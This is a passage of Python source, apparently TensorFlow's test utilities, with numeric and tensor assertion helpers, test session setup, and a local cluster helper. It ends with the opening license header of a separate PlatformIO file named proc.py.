test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err, "%f != %f +/- %f%s" %
(f1, f2, err, " (%s)" % msg if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is tensor-like then convert it to ndarray
if tensor_util.is_tf_type(a):
if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def evaluate_if_both_tensors(self, a, b):
if (tensor_util.is_tf_type(a) and tensor_util.is_tf_type(b) and
not isinstance(a, ops._EagerTensorBase) and
not isinstance(b, ops._EagerTensorBase)):
return self.evaluate((a, b))
else:
return (a, b)
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
(a, b) = self.evaluate_if_both_tensors(a, b)
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# When the array rank is small, print its contents. Numpy array printing is
# implemented using inefficient recursion so prints can cause tests to
# time out.
if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
"%s.") % (a.shape, b.shape, b)
else:
shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
b.shape)
self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
msgs = [msg]
# np.allclose does not always work for our custom bfloat16 extension type
# when type promotions are involved, so we first cast any bfloat16 arrays
# to float32.
a_dtype = a.dtype
a = a.astype(np.float32) if a.dtype == dtypes.bfloat16.as_numpy_dtype else a
b = b.astype(np.float32) if b.dtype == dtypes.bfloat16.as_numpy_dtype else b
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Adds more details to np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# tell user which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
msgs.append("not close where = {}".format(np.where(cond)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not close lhs = {}".format(x))
msgs.append("not close rhs = {}".format(y))
msgs.append("not close dif = {}".format(np.abs(x - y)))
msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
msgs.append("dtype = {}, shape = {}".format(a_dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join(str(p) for p in path) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections_abc.Mapping)
if a_is_dict != isinstance(b, collections_abc.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if not work, then traverse
# through the sequence, which is more expensive.
try:
(a, b) = self.evaluate_if_both_tensors(a, b)
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
@py_func_if_in_function
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Note: the implementation follows
[`numpy.allclose`](https://docs.scipy.org/doc/numpy/reference/generated/numpy.allclose.html)
(and numpy.testing.assert_allclose). It checks whether two arrays are
element-wise equal within a tolerance. The relative difference
(`rtol * abs(b)`) and the absolute difference `atol` are added together
to compare against the absolute difference between `a` and `b`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
if ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b):
return self._assertRaggedClose(a, b, rtol, atol, msg)
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
(a, b) = self.evaluate_if_both_tensors(a, b)
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertNotAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Assert that two numpy arrays, or Tensors, do not have near values.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
except AssertionError:
return
msg = msg or ""
raise AssertionError("The two values are close at all elements. %s" % msg)
@py_func_if_in_function
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
if (ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b)):
return self._assertRaggedEqual(a, b, msg)
msg = msg if msg else ""
(a, b) = self.evaluate_if_both_tensors(a, b)
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# Arbitrary bounds so that we don't print giant tensors.
if (b.ndim <= 3 or b.size < 500):
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" Contents: %r. \n%s." % (a.shape, b.shape, b, msg))
else:
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
msgs = [msg]
if not np.all(same):
# Adds more details to np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
msgs.append("not equal where = {}".format(np.where(diff)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not equal lhs = %r" % x)
msgs.append("not equal rhs = %r" % y)
# Handle mixed string types as a result of PY2to3 migration. That is, the
# mixing between bytes (b-prefix strings, PY2 default) and unicodes
# (u-prefix strings, PY3 default).
if six.PY3:
if (a.dtype.kind != b.dtype.kind and
{a.dtype.kind, b.dtype.kind}.issubset({"U", "S", "O"})):
a_list = []
b_list = []
# OK to flatten `a` and `b` because they are guaranteed to have the
# same shape.
for out_list, flat_arr in [(a_list, a.flat), (b_list, b.flat)]:
for item in flat_arr:
if isinstance(item, str):
out_list.append(item.encode("utf-8"))
else:
out_list.append(item)
a = np.array(a_list)
b = np.array(b_list)
np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertNotAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors do not have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
try:
self.assertAllEqual(a, b)
except AssertionError:
return
raise AssertionError("The two values are equal at all elements. %s" % msg)
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
(a, comparison_target) = self.evaluate_if_both_tensors(a, comparison_target)
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
(a, comparison_target) = self.evaluate_if_both_tensors(a, comparison_target)
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
(a, comparison_target) = self.evaluate_if_both_tensors(a, comparison_target)
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
(a, comparison_target) = self.evaluate_if_both_tensors(a, comparison_target)
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate
lines. A line of ellipses (...) will be appended at the end if the number of
subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
if np.ndim(value) == 0:
return [prefix + "[0] : " + str(value)]
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
@py_func_if_in_function
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound) if open_lower_bound else np.less(
target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
if not isinstance(target, list):
arrays = [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and returns True
(success) or False (please fail the test). Otherwise, the error message
is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" %
(str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertRaisesIncompatibleShapesError(
self, exception_type=errors.InvalidArgumentError):
return self.assertRaisesWithPredicateMatch(
exception_type, r"Incompatible shapes|Dimensions must be equal|"
r"required broadcastable shapes")
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
def _GetPyList(self, a):
"""Converts `a` to a nested python list."""
if isinstance(a, ragged_tensor.RaggedTensor):
return self.evaluate(a).to_list()
elif isinstance(a, ops.Tensor):
a = self.evaluate(a)
return a.tolist() if isinstance(a, np.ndarray) else a
elif isinstance(a, np.ndarray):
return a.tolist()
elif isinstance(a, ragged_tensor_value.RaggedTensorValue):
return a.to_list()
else:
return np.array(a).tolist()
def _assertRaggedEqual(self, a, b, msg):
"""Asserts that two ragged tensors are equal."""
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self.assertEqual(a_list, b_list, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertRaggedClose(self, a, b, rtol, atol, msg=None):
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self._assertListCloseRecursive(a_list, b_list, rtol, atol, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertListCloseRecursive(self, a, b, rtol, atol, msg, path="value"):
self.assertEqual(type(a), type(b))
if isinstance(a, (list, tuple)):
self.assertLen(a, len(b), "Length differs for %s" % path)
for i in range(len(a)):
self._assertListCloseRecursive(a[i], b[i], rtol, atol, msg,
"%s[%s]" % (path, i))
else:
self._assertAllCloseRecursive(a, b, rtol, atol, path, msg)
# Fix Python 3+ compatibility issues
if not six.PY2:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
def _create_session(self, graph, config, force_gpu):
"""See session() for details."""
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
# TODO(b/114333779): Enforce allow_soft_placement=False when
# use_gpu=False. Currently many tests rely on the fact that any device
# will be used even when a specific device is supposed to be used.
allow_soft_placement = not force_gpu
if config is None:
config = context.context().config
config.allow_soft_placement = allow_soft_placement
elif not allow_soft_placement and config.allow_soft_placement:
config_copy = context.context().config
config = config_copy
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
# Disable Grappler constant folding since some tests & benchmarks
# use constant input and become meaningless after constant folding.
# DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
# GRAPPLER TEAM.
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.pin_to_host_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
"PS" stands for "parameter server": a task responsible for storing and
updating the model's parameters. Other tasks send updates to these parameters
as they work on optimizing the parameters. This particular division of labor
between tasks is not required, but is common for distributed training.
Read more at https://www.tensorflow.org/guide/extend/architecture

Figure illustrates the interaction of these components.
"/job:worker/task:0" and "/job:ps/task:0" are both tasks with worker services.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.compat.v1.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in the
documentation of `tf.distribute.Server`.
worker_config: (optional) `tf.ConfigProto` to initialize workers. Can be
used to instantiate multiple devices etc.
ps_config: (optional) `tf.ConfigProto` to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.distribute.Server` (all running
locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
import portpicker # pylint: disable=g-import-not-at-top
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer, producer_version
@contextlib.contextmanager
def _fake_gradient_tape_context_manager():
"""tf.gradients(...) implemented as tf.GradientTape context manager interface.
This is useful to test tf.gradients() in tests that uses tf.GradientTape().
Yields:
gradient tape instance that's implemented by tf.gradients() underneath.
"""
try:
class FakeGradientTape:
def watch(self, x):
pass
def gradient(self, y, x, grad_ys=None):
result = gradients_impl.gradients(y, x, grad_ys)
# Unlike `tape.gradient()`, `tf.gradients()` returns a list for a single
# element. So unpack if needed to match `tape.gradient()` behavior.
if not isinstance(x, (list, tuple)):
assert len(result) == 1
return result[0]
return result
yield FakeGradientTape()
finally:
pass
class AbstractGradientTape:
"""Abstract GradientTape context manager that has multiple implementations.
This is useful to test both tf.GradientTape() and tf.gradients() without
duplicating tests.
"""
def __init__(self, use_tape, persistent=False):
self._use_tape = use_tape
self._persistent = persistent
def __enter__(self):
if self._use_tape:
self._tape_impl = backprop.GradientTape(persistent=self._persistent)
else:
self._tape_impl = _fake_gradient_tape_context_manager()
return self._tape_impl.__enter__()
def __exit__(self, exc_type, exc_val, exc_tb):
self._tape_impl.__exit__(exc_type, exc_val, exc_tb)
@contextlib.contextmanager
def run_functions_eagerly(run_eagerly):
"""Runs functions eagerly if `run_eagerly` is true.
WARNING: Setting `run_eagerly` to True in tests running in V1 graph mode
*WILL NOT* make the tf.function to run eagerly because eager is disabled by
default in V1. Instead, tf.function will run as a traced graph function.
Ensures that the state (for running functions eagerly) is back to the initial
`def_function.RUN_FUNCTIONS_EAGERLY` state.
Args:
run_eagerly: Boolean determining whether to run the function eagerly or not.
Raises:
ValueError if `run_eagerly` is not a boolean.
Yields:
Nothing.
"""
if not isinstance(run_eagerly, bool):
raise ValueError(
"Expected bool for `run_eagerly` but got {}".format(run_eagerly))
is_eager = context.executing_eagerly()
if not is_eager and run_eagerly:
logging.warning(
"Running tf.function eagerly in V1 graph mode is not supported. "
"tf.function will be run as a traced graph function.")
initial_state = def_function.functions_run_eagerly()
def_function.run_functions_eagerly(run_eagerly)
try:
yield
finally:
def_function.run_functions_eagerly(initial_state)
|
proc.py | # Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
